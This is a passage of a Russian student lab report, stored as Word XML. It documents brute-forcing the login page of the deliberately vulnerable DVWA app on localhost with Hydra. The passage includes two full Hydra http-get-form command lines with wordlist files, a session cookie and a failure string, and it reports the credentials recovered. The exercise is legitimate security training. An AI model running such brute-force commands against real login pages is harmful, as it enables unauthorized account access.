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использования Hydra для перебора логинов и паролей.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Первоначальный этап - создание файла passwords.txt для хранения паролей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="3733800" cy="683231"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Создание файла passwords.tx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passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Затем заполняю passwords.txt соответствующими данными.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="2552700" cy="1447800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Содержание passwords.txt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Содержание passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Переключаю настройки безопасности в приложении DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="3733800" cy="1140559"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Изменение настроек безопасности в DVWA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настроек безопасности в DVWA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Осуществляю анализ URL и кук для последующего тестирования брутфорса.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="3733800" cy="647830"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Анализ URL и кук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Анализ URL и кук</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Запускаю запрос для перебора паролей из passwords.txt для учетной записи admin. В результате успешно нахожу логин и пароль: admin:password.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~/passwords.txt 127.0.0.1 http-get-form </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/DVWA/vulnerabilities/brute/:username=^USER^&amp;password=^PASS^&amp;Login=Login:H=Cookie\:PHPSESSID=25c69iu24q22euc6hjnj2m0sch;security=low:F=Username and/or password incorrect"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="3733800" cy="2030663"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Запрос для перебора паролей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Запрос для перебора паролей</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Создаю файл usernames.txt для перебора логинов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="3733800" cy="433094"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Создание файла usernames.txt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usernames.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Заполняю файл usernames.txt соответствующими данными.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="3733800" cy="1139266"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Содержание usernames.txt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9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Содержание usernames.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Изменяю запрос, чтобы произвести перебор паролей и логинов из файлов passwords.txt и usernames.txt. В результате успешно нахожу логин и пароль: admin:password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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~/usernames.txt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~/passwords.txt 127.0.0.1 http-get-form </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/DVWA/vulnerabilities/brute/:username=^USER^&amp;password=^PASS^&amp;Login=Login:H=Cookie\:PHPSESSID=25c69iu24q22euc6hjnj2m0sch;security=low:F=Username and/or password incorrect"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="3733800" cy="1968297"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Измененный запрос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Измененный запрос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освоил использование Hydra для перебора логинов и паролей, отправляя соответствующие запросы.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3</dc:title>
  <dc:creator>Хрусталев Влад Николаевич</dc:creator>
  <dc:language>ru-RU</dc:language>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-06T20:09:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-06T20:09:28Z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